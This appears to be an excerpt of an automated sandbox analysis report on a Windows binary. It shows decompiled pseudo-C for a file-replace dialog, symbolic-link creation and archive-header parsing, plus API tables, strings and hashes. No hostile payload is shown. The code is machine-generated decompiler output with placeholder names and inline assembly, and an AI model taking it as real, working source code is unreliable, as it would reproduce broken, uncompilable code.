							E00263E41( &_a896, 0x200, L"%s %s %s", E0026DA42(_t152, 0x99));
							_t177 = _t179 + 0x18;
							SetDlgItemTextW(_t159, 0x6b,  &_a896);
							_t153 =  *0x2bce14;
							_t157 =  *0x2bce10;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E00279D99(_t157, _t153,  &_a212, 0x32);
								_push(E0026DA42(_t153, 0x98));
								E00263E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t159, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t163 != 1) {
						goto L27;
					}
					_t169 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t169;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t169);
						L13:
						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0x29df4c(_t137);
						}
						EndDialog(_t159, _t169);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t169 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t169 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}

0x0027afb9
0x0027afb9
0x0027afbe
0x0027afc4
0x0027afcd
0x0027afd7
0x0027aff6
0x0027b000
0x0027b006
0x0027b080
0x0027b09b
0x0027b0aa
0x0027b0c0
0x0027b0dd
0x0027b0f3
0x0027b10f
0x0027b114
0x0027b127
0x0027b137
0x0027b13d
0x0027b143
0x0027b144
0x0027b14a
0x0027b14d
0x0027b154
0x0027b172
0x0027b17c
0x0027b184
0x0027b1a2
0x0027b1a7
0x0027b1b5
0x0027b1b8
0x0027b1c6
0x0027b1c8
0x0027b1da
0x0027b1e2
0x0027b1e4
0x0027b1e5
0x0027b1e7
0x0027b1e8
0x0027b1e9
0x0027b1f8
0x0027b213
0x0027b218
0x0027b226
0x0027b226
0x0027b23c
0x0027b242
0x0027b24d
0x0027b25c
0x0027b26c
0x0027b286
0x0027b29e
0x0027b2a8
0x0027b2b0
0x0027b2cf
0x0027b2d4
0x0027b2e2
0x0027b2ec
0x0027b2f2
0x0027b2f8
0x0027b30c
0x0027b31b
0x0027b332
0x0027b337
0x0027b345
0x0027b345
0x0027b2f8
0x0027b347
0x0027b347
0x0027b349
0x0027b353
0x0027b353
0x0027b00b
0x00000000
0x00000000
0x0027b016
0x0027b017
0x0027b019
0x0027b03d
0x0027b03d
0x0027b03f
0x0027b03f
0x0027b040
0x0027b04a
0x0027b052
0x0027b055
0x0027b055
0x0027b05d
0x00000000
0x0027b05d
0x0027b01b
0x0027b01e
0x0027b072
0x00000000
0x0027b072
0x0027b020
0x0027b023
0x0027b06f
0x00000000
0x0027b06f
0x0027b025
0x0027b028
0x0027b069
0x00000000
0x0027b069
0x0027b02a
0x0027b02d
0x00000000
0x00000000
0x0027b02f
0x0027b032
0x0027b065
0x00000000
0x0027b065
0x0027b037
0x00000000
0x00000000
0x00000000
0x0027b037
0x0027aff8
0x0027affa
0x00000000

APIs

Part of subcall function 002612D7: GetDlgItem.USER32(00000000,00003021), ref: 0026131B
Part of subcall function 002612D7: SetWindowTextW.USER32(00000000,002922E4), ref: 00261331

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0027B04A
EndDialog.USER32(?,00000006), ref: 0027B05D
GetDlgItem.USER32(?,0000006C), ref: 0027B079
SetFocus.USER32(00000000), ref: 0027B080
SetDlgItemTextW.USER32(?,00000065,?), ref: 0027B0C0
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0027B0F3
FindFirstFileW.KERNEL32(?,?), ref: 0027B109
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0027B127
FileTimeToSystemTime.KERNEL32(?,?), ref: 0027B137
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0027B154
GetDateFormatW.KERNEL32 ref: 0027B172
_swprintf.LIBCMT ref: 0027B1A2

Part of subcall function 00263E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00263E54

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0027B1B5
FindClose.KERNEL32(00000000), ref: 0027B1B8
_swprintf.LIBCMT ref: 0027B213
SetDlgItemTextW.USER32(?,00000068,?), ref: 0027B226
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0027B23C
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0027B25C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0027B26C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0027B286
GetDateFormatW.KERNEL32 ref: 0027B29E
_swprintf.LIBCMT ref: 0027B2CF
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0027B2E2
_swprintf.LIBCMT ref: 0027B332
SetDlgItemTextW.USER32(?,00000069,?), ref: 0027B345

Part of subcall function 00279D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00279DBF
Part of subcall function 00279D99: GetNumberFormatW.KERNEL32(00000400,00000000,?,0029D600,?,?), ref: 00279E0E

Strings

REPLACEFILEDLG, xrefs: 0027AFE0
%s %s, xrefs: 0027B201, 0027B324
%s %s %s, xrefs: 0027B190, 0027B2BC

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 72ef3347d4f60ba6ae58f1c142c8499b2764b229bb7d268678ff5647a8899930
Instruction ID: 0affe52353d0e927a88f4f8ab9b37a815fcf1380c712f31c71c29645eaf573df
Opcode Fuzzy Hash: 72ef3347d4f60ba6ae58f1c142c8499b2764b229bb7d268678ff5647a8899930
Instruction Fuzzy Hash: 9791C372658349BFD631DBA0DD49FFB77ACEB8A700F00481AF749D2081D775AA148B62

Uniqueness

Uniqueness Score: -1.00%

Function 00266FC6, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00266FC6(void* __edx) {
				void* __esi;
				signed int _t111;
				signed int _t113;
				void* _t116;
				int _t118;
				intOrPtr _t121;
				signed int _t139;
				int _t145;
				void* _t182;
				void* _t185;
				void* _t190;
				short _t191;
				void* _t197;
				void* _t202;
				void* _t203;
				void* _t222;
				void* _t223;
				intOrPtr _t224;
				intOrPtr _t226;
				void* _t228;
				WCHAR* _t229;
				intOrPtr _t233;
				short _t237;
				void* _t238;
				intOrPtr _t239;
				short _t241;
				void* _t242;
				void* _t244;
				void* _t245;

				_t223 = __edx;
				E0027D870(E0029126D, _t242);
				E0027D940();
				 *((intOrPtr*)(_t242 - 0x18)) = 1;
				if( *0x2a0043 == 0) {
					E00267A15(L"SeRestorePrivilege");
					E00267A15(L"SeCreateSymbolicLinkPrivilege");
					 *0x2a0043 = 1;
				}
				_t199 = _t242 - 0x2c;
				E00266ED7(_t242 - 0x2c, 0x1418);
				_t197 =  *(_t242 + 0x10);
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				E0026FAB1(_t242 - 0x107c, _t197 + 0x1104, 0x800);
				 *((intOrPtr*)(_t242 - 0x10)) = E00282B33(_t242 - 0x107c);
				_t232 = _t242 - 0x107c;
				_t228 = _t242 - 0x207c;
				_t111 = E00284DA0(_t242 - 0x107c, L"\\??\\", 4);
				_t245 = _t244 + 0x10;
				asm("sbb al, al");
				_t113 =  ~_t111 + 1;
				 *(_t242 - 0x14) = _t113;
				if(_t113 != 0) {
					_t232 = _t242 - 0x1074;
					_t190 = E00284DA0(_t242 - 0x1074, L"UNC\\", 4);
					_t245 = _t245 + 0xc;
					if(_t190 == 0) {
						_t191 = 0x5c;
						 *((short*)(_t242 - 0x207c)) = _t191;
						_t228 = _t242 - 0x207a;
						_t232 = _t242 - 0x106e;
					}
				}
				E00284D7E(_t228, _t232);
				_t116 = E00282B33(_t242 - 0x207c);
				_t233 =  *((intOrPtr*)(_t242 + 8));
				_t229 =  *(_t242 + 0xc);
				 *(_t242 + 0x10) = _t116;
				if( *((char*)(_t233 + 0x618f)) != 0) {
					L9:
					_push(1);
					_push(_t229);
					E00269D3A(_t199, _t242);
					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
						_t118 = CreateDirectoryW(_t229, 0);
						__eflags = _t118;
						if(_t118 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t182 = CreateFileW(_t229, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 == 0xffffffff) {
							L27:
							 *((char*)(_t242 - 0x18)) = 0;
							L28:
							E0026159C(_t242 - 0x2c);
							 *[fs:0x0] =  *((intOrPtr*)(_t242 - 0xc));
							return  *((intOrPtr*)(_t242 - 0x18));
						}
						CloseHandle(_t182);
						L14:
						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
						if(_t121 != 3) {
							__eflags = _t121 - 2;
							if(_t121 == 2) {
								L18:
								_t202 =  *(_t242 - 0x2c);
								_t224 =  *((intOrPtr*)(_t242 - 0x10));
								 *_t202 = 0xa000000c;
								_t237 = _t224 + _t224;
								 *((short*)(_t202 + 0xa)) = _t237;
								 *((short*)(_t202 + 4)) = 0x10 + ( *(_t242 + 0x10) + _t224) * 2;
								 *((intOrPtr*)(_t202 + 6)) = 0;
								E00284D7E(_t202 + 0x14, _t242 - 0x107c);
								_t60 = _t237 + 2; // 0x3
								_t238 =  *(_t242 - 0x2c);
								 *((short*)(_t238 + 0xc)) = _t60;
								 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
								E00284D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 0xb) * 2, _t242 - 0x207c);
								_t139 =  *(_t242 - 0x14) & 0x000000ff ^ 0x00000001;
								__eflags = _t139;
								 *(_t238 + 0x10) = _t139;
								L19:
								_t203 = CreateFileW(_t229, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t242 + 0x10) = _t203;
								if(_t203 == 0xffffffff) {
									goto L27;
								}
								_t145 = DeviceIoControl(_t203, 0x900a4, _t238, ( *(_t238 + 4) & 0x0000ffff) + 8, 0, 0, _t242 - 0x30, 0);
								_t262 = _t145;
								if(_t145 != 0) {
									E0026943C(_t242 - 0x30a0);
									 *(_t242 - 4) = 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t242 - 0x30a0)) + 8))();
									_t239 =  *((intOrPtr*)(_t242 + 8));
									 *(_t242 - 0x309c) =  *(_t242 + 0x10);
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E00269A7E(_t242 - 0x30a0, _t239,  ~( *(_t239 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t239 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t239 + 0x72d0)) & _t197 + 0x00001050);
									E002694DA(_t242 - 0x30a0);
									__eflags =  *((char*)(_t239 + 0x61a0));
									if( *((char*)(_t239 + 0x61a0)) == 0) {
										E0026A12F(_t229,  *((intOrPtr*)(_t197 + 0x24)));
									}
									E0026946E(_t242 - 0x30a0);
									goto L28;
								}
								CloseHandle( *(_t242 + 0x10));
								E00266BF5(_t262, 0x15, 0, _t229);
								_t160 = GetLastError();
								if(_t160 == 5 || _t160 == 0x522) {
									if(E0026FC98() == 0) {
										E00261567(_t242 - 0x7c, 0x18);
										_t160 = E00270A9F(_t242 - 0x7c);
									}
								}
								E0027E214(_t160);
								E00266E03(0x2a00e0, 9);
								_push(_t229);
								if( *((char*)(_t197 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t121 - 1;
							if(_t121 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t222 =  *(_t242 - 0x2c);
						_t226 =  *((intOrPtr*)(_t242 - 0x10));
						 *_t222 = 0xa0000003;
						_t241 = _t226 + _t226;
						 *((short*)(_t222 + 0xa)) = _t241;
						 *((short*)(_t222 + 4)) = 0xc + ( *(_t242 + 0x10) + _t226) * 2;
						 *((intOrPtr*)(_t222 + 6)) = 0;
						E00284D7E(_t222 + 0x10, _t242 - 0x107c);
						_t40 = _t241 + 2; // 0x3
						_t238 =  *(_t242 - 0x2c);
						 *((short*)(_t238 + 0xc)) = _t40;
						 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
						E00284D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 9) * 2, _t242 - 0x207c);
						goto L19;
					}
				}
				if( *(_t242 - 0x14) != 0) {
					goto L27;
				}
				_t185 = E0026B4F2(_t197 + 0x1104);
				_t255 = _t185;
				if(_t185 != 0) {
					goto L27;
				}
				_push(_t197 + 0x1104);
				_push(_t229);
				_push(_t197 + 0x28);
				_push(_t233);
				if(E002677F7(_t223, _t255) == 0) {
					goto L27;
				}
				goto L9;
			}

0x00266fc6
0x00266fcb
0x00266fd5
0x00266fe7
0x00266fea
0x00266ff1
0x00266ffb
0x00267000
0x00267000
0x0026700b
0x0026700e
0x00267013
0x00267016
0x0026702d
0x00267040
0x00267043
0x0026704b
0x00267057
0x0026705c
0x00267061
0x00267063
0x00267065
0x0026706a
0x0026706e
0x0026707c
0x00267081
0x00267086
0x0026708a
0x0026708b
0x00267092
0x00267098
0x00267098
0x00267086
0x002670a0
0x002670ac
0x002670b1
0x002670b7
0x002670ba
0x002670c4
0x002670fe
0x00267101
0x00267102
0x00267103
0x0026710f
0x00267146
0x0026714c
0x0026714e
0x00000000
0x00000000
0x00000000
0x0026711a
0x0026712b
0x00267134
0x002672f4
0x002672f4
0x002672f8
0x002672fb
0x00267309
0x00267313
0x00267313
0x0026713b
0x00267154
0x00267154
0x0026715d
0x002671c5
0x002671c8
0x002671d2
0x002671d2
0x002671d5
0x002671dd
0x002671e3
0x002671e6
0x002671f1
0x002671f7
0x00267205
0x0026720a
0x0026720d
0x00267210
0x00267219
0x0026722e
0x0026723c
0x0026723c
0x0026723f
0x00267242
0x0026725a
0x0026725c
0x00267262
0x00000000
0x00000000
0x00267280
0x00267286
0x00267288
0x00267324
0x00267335
0x00267339
0x0026733c
0x00267342
0x00267356
0x00267369
0x0026737c
0x00267387
0x00267392
0x00267397
0x0026739e
0x002673a4
0x002673a4
0x002673af
0x00000000
0x002673af
0x00267292
0x0026729d
0x002672a2
0x002672ab
0x002672bb
0x002672c2
0x002672ca
0x002672ca
0x002672bb
0x002672d6
0x002672df
0x002672eb
0x002672ec
0x00267316
0x002672ee
0x002672ee
0x002672ee
0x00000000
0x002672ec
0x002671ca
0x002671cc
0x00000000
0x00000000
0x00000000
0x002671cc
0x0026715f
0x00267162
0x0026716a
0x00267170
0x00267173
0x0026717e
0x00267184
0x00267192
0x00267197
0x0026719a
0x0026719d
0x002671a6
0x002671bb
0x00000000
0x002671c0
0x0026710f
0x002670ca
0x00000000
0x00000000
0x002670d7
0x002670dc
0x002670de
0x00000000
0x00000000
0x002670ea
0x002670eb
0x002670ef
0x002670f0
0x002670f8
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00266FCB
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 0026712B
CloseHandle.KERNEL32(00000000), ref: 0026713B

Part of subcall function 00267A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00267A24
Part of subcall function 00267A15: GetLastError.KERNEL32 ref: 00267A6A
Part of subcall function 00267A15: CloseHandle.KERNEL32(?), ref: 00267A79

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00267146
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00267254
DeviceIoControl.KERNEL32 ref: 00267280
CloseHandle.KERNEL32(?), ref: 00267292
GetLastError.KERNEL32(00000015,00000000,?), ref: 002672A2
RemoveDirectoryW.KERNEL32(?), ref: 002672EE
DeleteFileW.KERNEL32(?), ref: 00267316

Strings

UNC\, xrefs: 00267076
SeRestorePrivilege, xrefs: 00266FEC
\??\, xrefs: 00267051
SeCreateSymbolicLinkPrivilege, xrefs: 00266FF6

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 4f7fd03a57125f1f80a86c5be576875a59063c89a8c9aeb33c3e6198af355571
Instruction ID: f2b5300cc1064b114199504b7ffdce69ac8c3b415654c348d89f4aaaac0d4b75
Opcode Fuzzy Hash: 4f7fd03a57125f1f80a86c5be576875a59063c89a8c9aeb33c3e6198af355571
Instruction Fuzzy Hash: 3AB1F371924219EBDF21DF64EC45BEE73B8AF04304F0444AAF919E7182D774AAA5CF60

Uniqueness

Uniqueness Score: -1.00%

Function 002630FC, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 605
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E002630FC(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t378;
				void* _t380;
				void* _t381;
				void* _t392;
				intOrPtr* _t394;
				intOrPtr* _t396;
				signed int _t409;
				signed int _t419;
				char _t431;
				signed int _t432;
				signed int _t437;
				signed int _t441;
				intOrPtr _t449;
				unsigned int _t455;
				unsigned int _t458;
				signed int _t462;
				signed int _t470;
				signed int _t479;
				signed int _t484;
				signed int _t498;
				intOrPtr _t499;
				signed int _t500;
				signed char _t501;
				unsigned int _t502;
				void* _t509;
				void* _t517;
				signed int _t520;
				void* _t521;
				signed int _t531;
				unsigned int _t534;
				void* _t539;
				intOrPtr _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				intOrPtr _t556;

				_t396 = __ecx;
				_t546 = _t545 - 0x68;
				E0027D870(E002911A9, _t544);
				E0027D940();
				_t394 = _t396;
				E0026C223(_t544 + 0x30, _t394);
				 *(_t544 + 0x60) = 0;
				 *((intOrPtr*)(_t544 - 4)) = 0;
				if( *((intOrPtr*)(_t394 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t544 + 0x6a)) = 0;
					L16:
					if(E0026C42E(_t498, 7) >= 7) {
						 *(_t394 + 0x21f4) = 0;
						_t509 = _t394 + 0x21e4;
						 *_t509 = E0026C29E(_t544 + 0x30);
						_t531 = E0026C40A(_t544 + 0x30, 4);
						_t242 = E0026C39E(_t498);
						__eflags = _t242 | _t498;
						if((_t242 | _t498) == 0) {
							L85:
							E00261EF8(_t394);
							L86:
							E0026159C(_t544 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
							return  *(_t544 + 0x60);
						}
						__eflags = _t531;
						if(_t531 == 0) {
							goto L85;
						}
						_t42 = _t531 - 3; // -3
						_t534 = _t531 + 4 + _t242;
						_t409 = _t42 + _t242;
						__eflags = _t409;
						 *(_t544 + 0x64) = _t534;
						if(_t409 < 0) {
							goto L85;
						}
						__eflags = _t534 - 7;
						if(_t534 < 7) {
							goto L85;
						}
						E0026C42E(_t498, _t409);
						__eflags =  *(_t544 + 0x48) - _t534;
						if( *(_t544 + 0x48) < _t534) {
							goto L17;
						}
						_t248 = E0026C37E(_t544 + 0x30);
						 *(_t394 + 0x21e8) = E0026C39E(_t498);
						_t250 = E0026C39E(_t498);
						 *(_t394 + 0x21ec) = _t250;
						__eflags =  *_t509 - _t248;
						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
						_t254 =  *(_t394 + 0x21e8);
						 *(_t394 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
						 *(_t544 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
							 *(_t544 + 0x58) = 0;
							 *(_t544 + 0x54) = 0;
							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
								_t536 = _t256;
								 *(_t544 + 0x64) = _t256;
								 *(_t544 + 0x5c) = _t256;
								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E0026C39E(_t498);
									_t536 = _t362;
									 *(_t544 + 0x64) = _t362;
									 *(_t544 + 0x5c) = _t498;
								}
								_t257 = E00261901(_t394,  *(_t394 + 0x21f0));
								_t499 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t394 + 0x6ca8)) = E00263CA7( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
								_t500 =  *(_t394 + 0x21e8);
								__eflags = _t500 - 1;
								if(__eflags == 0) {
									E0026A96C(_t394 + 0x2208);
									_t419 = 5;
									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
									_t501 = E0026C39E(_t500);
									 *(_t394 + 0x6cb5) = _t501 & 1;
									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
									_t431 = 1;
									 *((char*)(_t394 + 0x6cba)) = 1;
									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t394 + 0x6cb8)) = 0;
									__eflags = _t501 & 0x00000002;
									if((_t501 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = E0026C39E(_t501);
										_t270 = 0;
										_t431 = 1;
									}
									__eflags =  *(_t394 + 0x6cb5);
									if( *(_t394 + 0x6cb5) == 0) {
										L81:
										_t431 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t394 + 0x6cb9)) = _t431;
											_t432 =  *(_t544 + 0x58);
											__eflags = _t432 |  *(_t544 + 0x54);
											if((_t432 |  *(_t544 + 0x54)) != 0) {
												E0026200C(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
											}
											L84:
											 *(_t544 + 0x60) =  *(_t544 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t500 - 3;
								if(_t500 <= 3) {
									__eflags = _t500 - 2;
									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
									 *(_t544 + 0x2c) = _t517;
									E0026A8D2(_t517, 0);
									_t437 = 5;
									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
									_t539 =  *(_t544 + 0x2c);
									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
									 *((char*)(_t539 + 0x10f9)) = 1;
									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
									 *(_t539 + 0x1094) = E0026C39E(_t500);
									 *(_t539 + 0x1060) = E0026C39E(_t500);
									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t539 + 0x1064) = _t500;
									 *(_t539 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t539 + 0x1060) = 0x7fffffff;
										 *(_t539 + 0x1064) = 0x7fffffff;
									}
									_t441 =  *(_t539 + 0x105c);
									_t520 =  *(_t539 + 0x1064);
									_t290 =  *(_t539 + 0x1058);
									_t502 =  *(_t539 + 0x1060);
									__eflags = _t441 - _t520;
									if(__eflags < 0) {
										L51:
										_t290 = _t502;
										_t441 = _t520;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t539 + 0x106c) = _t441;
											 *(_t539 + 0x1068) = _t290;
											_t291 = E0026C39E(_t502);
											__eflags =  *(_t539 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
												E00270A25(_t539 + 0x1040, _t502, E0026C29E(_t544 + 0x30), 0);
											}
											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
											__eflags =  *(_t539 + 0x1094) & 0x00000004;
											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
												 *(_t539 + 0x1070) = 2;
												 *((intOrPtr*)(_t539 + 0x1074)) = E0026C29E(_t544 + 0x30);
											}
											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
											_t292 = E0026C39E(_t502);
											 *(_t544 + 0x64) = _t292;
											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t449 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
											__eflags = _t449 - 0x32;
											if(_t449 != 0x32) {
												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t539 + 0x18)) = E0026C39E(_t502);
											_t521 = E0026C39E(_t502);
											 *(_t539 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t539 + 0x18));
											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t539 + 0x10fc;
													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t539 + 0x10fc) = 1;
											}
											_t455 =  *(_t539 + 8);
											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
											__eflags =  *(_t544 + 0x60) - 2;
											_t458 =  *(_t544 + 0x64);
											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
											if( *(_t544 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t458 & 0x00000040;
												if((_t458 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t539 + 0x10f0)) = _t302;
												_t304 =  *(_t539 + 0x1094) & 1;
												 *(_t539 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t521 - 0x1fff;
												if(_t521 >= 0x1fff) {
													_t521 = 0x1fff;
												}
												E0026C300(_t544 + 0x30, _t544 - 0x2074, _t521);
												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
												_push(0x800);
												_t522 = _t539 + 0x28;
												_push(_t539 + 0x28);
												_push(_t544 - 0x2074);
												E00271094();
												_t462 =  *(_t544 + 0x58);
												__eflags = _t462 |  *(_t544 + 0x54);
												if((_t462 |  *(_t544 + 0x54)) != 0) {
													E0026200C(_t394, _t544 + 0x30, _t462, _t539);
												}
												_t319 =  *(_t544 + 0x60);
												__eflags =  *(_t544 + 0x60) - 2;
												if( *(_t544 + 0x60) != 2) {
													L72:
													_t320 = E00282B69(_t319, _t522, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t394 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E00261F3D(_t394, _t539);
